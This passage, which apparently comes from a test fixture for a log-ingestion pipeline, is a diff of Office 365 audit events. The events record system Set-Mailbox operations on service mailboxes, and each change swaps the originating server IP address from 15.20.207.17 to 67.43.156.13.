- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:12\",\"ExternalAccess\":true,\"Id\":\"425128e3-4281-42f6-4ec7-08d7adfc0acd\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -4468,7 +4468,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "ProhibitSendReceiveQuota",
@@ -4550,7 +4550,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:14\",\"ExternalAccess\":true,\"Id\":\"6ddabbf8-4b7c-4982-2683-08d7adfc0c10\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -4562,7 +4562,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -4636,7 +4636,7 @@
 },
 {
 "event": {
- "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
+ "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"e6a88958-ff2a-4e9b-d681-08d7adfc0b73\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}"
 },
 "o365audit": {
 "AppId": "",
@@ -4648,7 +4648,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com",
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)",
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota",
@@ -4722,7 +4722,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:02\",\"ExternalAccess\":true,\"Id\":\"f580aae6-d0d5-4204-1a13-08d7ac0f2a03\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -4734,7 +4734,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota", 
@@ -4808,7 +4808,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" }, "o365audit": { "AppId": "", 
@@ -4820,7 +4820,7 @@
 "Operation": "Set-Mailbox",
 "OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
 "OrganizationName": "testsiem.onmicrosoft.com", 
- "OriginatingServer": "HE1PR0102MB3228 (15.20.207.17)", 
+ "OriginatingServer": "HE1PR0102MB3228 (67.43.156.13)",
 "Parameters": [
 {
 "Name": "RecoverableItemsQuota", 
@@ -4894,7 +4894,7 @@ }, { "event": { - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}" + "original": 
"{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"2db154f6-63ae-4a31-c548-08d7adfc0d1d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 